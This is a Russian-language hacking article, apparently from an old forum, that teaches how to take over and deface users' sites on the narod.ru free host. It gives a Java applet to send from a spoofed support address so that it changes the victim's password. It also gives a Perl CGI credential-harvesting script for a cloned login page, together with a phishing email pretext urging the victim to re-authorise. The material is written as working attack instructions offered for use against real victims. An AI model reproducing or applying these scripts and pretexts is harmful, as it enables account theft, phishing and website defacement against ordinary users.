Как обычно берем наш любимый narod.ru , и ломаем его сайты. К примеру возьмем сайт www.ulashir.narod.ru
и дефейсим его, как? да легко! Ты же знаешь что пасс на сайт , такой же как и к мылу. так вот пишим
и вставляем его в письмо, (незабудь про соответствующий текст) и мыло лучше сделать support@narod.ru
или administrator@narod.ru, ну короче ты понял! Вот те листинг его надо вставить в письмо.
import java.applet.*;
import java.awt.*;
mport java.net.*;
public class readrie extends Applet
{
public void paint(Graphics g)
{
try
{
URL myURL=new URL("_ПУТЬ_editprofil.html");
getAppletContext().showDocument(myURL,"_self");
}
catch (Exception e)
{
g.drawString("Error", 10, 10);
}
}
} editprofil.html ( не забудьте отредактировать ИМЯ_ПОЛЬЗОВАТЕЛЯ и НОВЫЙ_ПАРОЛЬ)
Все скрипт готов, кстати на народе поста глюканая, так что если файл будет вложением, то Messenger откр
оет его автоматически. Еу а посли ты сам знаешь как попасть на сайт!!!
Удачи те друг!!! 2 Вот сидел я и решил всё таки написать чё-нить ;) По большому настоянию Eraser. Основа статьи это социальная инженерия, о которой уже было написано не мало. Не буду повторяться. Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем уже на «банальном» хостинге narod.ru.(Повторюсь: его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать ;) Начнём для проведения нижеописанных действий вам понадобятся:
1. Мозги
2. Руки
3. Хостинг с поддержкой CGI
4. Небольшое знание HTML
И так ищем жертву… У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа ;) Подправляем его, как надо, вставляем туда форму: Ещё надо написать write.cgi:
&GetFormInput; $name=$field{'name'};
$pass=$field{'pass'}; sub GetFormInput { (*fval) = @_ if @_ ;
local ($buf);
if ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
}
else {
$buf=$ENV{'QUERY_STRING'};
}
if ($buf eq "") {
return 0 ;
}
else {
@fval=split(/&/,$buf);
foreach $i (0 .. $#fval){
($name,$val)=split (/=/,$fval[$i],2);
$val=~tr/+/ /;
$val=~ s/%(..)/pack("c",hex($1))/ge;
$name=~tr/+/ /;
$name=~ s/%(..)/pack("c",hex($1))/ge; if (!defined($field{$name})) {
$field{$name}=$val;
}
else {
$field{$name} .= ",$val";
}
}
}
return 1;
}
open (OUTFILE, ">>pass.txt");
print OUTFILE "$name";
print OUTFILE "\n$pass";
print OUTFILE "\n=======END=======\n\n";
close (OUTFILE);
print "Location: http://your_redirect_URL\n" ; Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё наш сайт мы подготовили. ;)
Теперь пишем этому "карапузу" (прим. Eraser'a : телепузу =)) письмо с анонимного мыла от support@narod.yandex.ru вида: "Здравствуйте ваш сайт пытались взломать и вам срочно не позже чем через 96 часов
надо пройти повторную авторизацию. Идите по ссылке(ага вот тута он и отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так вот. ;) короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё готово.. теперь токо надо ждать ;).
Дополнение:
В доставание пароля вам поможет ваша фантазия при написание письма лопуху...
| 
Главная 